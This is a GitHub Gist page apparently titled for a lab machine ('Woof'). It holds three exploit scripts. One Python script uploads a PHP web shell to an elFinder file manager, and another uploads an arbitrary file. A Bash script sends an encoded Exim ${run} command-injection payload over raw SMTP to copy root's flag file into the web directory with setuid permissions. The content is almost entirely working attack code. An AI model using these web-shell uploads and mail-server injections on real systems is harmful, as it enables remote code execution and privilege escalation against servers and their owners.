-
-
Save sharpicx/04acfea637e37af38ccfca5e17edef4e to your computer and use it in GitHub Desktop.
HTR: Woof
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import random | |
| import string | |
| def upload_txt_file(file_name): | |
| file_data = "<?=`$_POST[0]`?>" | |
| upload_uri = "http://xxxxxxxxxx/xxx/xx/xxxxxxxxx.x/xxx/xxxxxxxxx.xxxxxxx.php" | |
| files = {"upload[]": (file_name, file_data, "application/x-httpd-php")} | |
| data = {"cmd": "upload", "target": "l1_Lw"} | |
| response = requests.post(upload_uri, files=files, data=data) | |
| print(f"Uploading file {file_name} to elFinder") | |
| print(response.text) | |
| upload_txt_file("example.phtml") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #PAYLOAD_SETUID='${run{\x2Fbin\x2Fsh\t-c\t\x22cp\t\x2Froot\x2Froot.txt}}' | |
| PAYLOAD_SETUID='${run{\x2Fbin\x2Fbash\t-c\t\x22cp\t\x2Froot\x2Froot\x2etxt\t\x2fvar\x2fwww\x2fhtml\x2fdev\x2fjs\x2felfinder2\x2e0\x2ffiles\x2froot\x2etxt\x26\x26\tchmod\t4777\t\x2fvar\x2fwww\x2fhtml\x2fdev\x2fjs\x2felfinder2\x2e0\x2ffiles\x2froot\x2etxt\x22}}@localhost' | |
| PAYLOAD=$PAYLOAD_SETUID | |
| exec 3<>/dev/tcp/localhost/25 | |
| read -u 3 && echo $REPLY | |
| echo "helo localhost" >&3 | |
| read -u 3 && echo $REPLY | |
| echo "mail from:<>" >&3 | |
| read -u 3 && echo $REPLY | |
| echo "rcpt to:<$PAYLOAD>" >&3 | |
| read -u 3 && echo $REPLY | |
| echo "data" >&3 | |
| read -u 3 && echo $REPLY | |
| for i in {1..31} | |
| do | |
| echo "Received: $i" >&3 | |
| done | |
| echo "." >&3 | |
| read -u 3 && echo $REPLY | |
| echo "quit" >&3 | |
| read -u 3 && echo $REPLY | |
| echo | |
| # wait for the magic to happen and spawn our shell | |
| echo "Waiting 5 seconds..." | |
| ls -la |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| def upload_exe_file(file_name): | |
| upload_uri = "http://xxxxxxxxxx/xxxxxxxxxx/xxxxxxxxxx/xxxxxxxxxx/xxxxxxxxxx/xxxxxxxxxx.xxxxxxxxxx.xxxxxxxxxx" | |
| files = {"upload[]": (file_name, open(file_name, "rb"), "application/octet-stream")} | |
| data = {"cmd": "upload", "target": "l1_Lw"} | |
| response = requests.post(upload_uri, files=files, data=data) | |
| print(f"Uploading file {file_name} to elFinder") | |
| print(response.text) | |
| upload_exe_file("test.sh") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment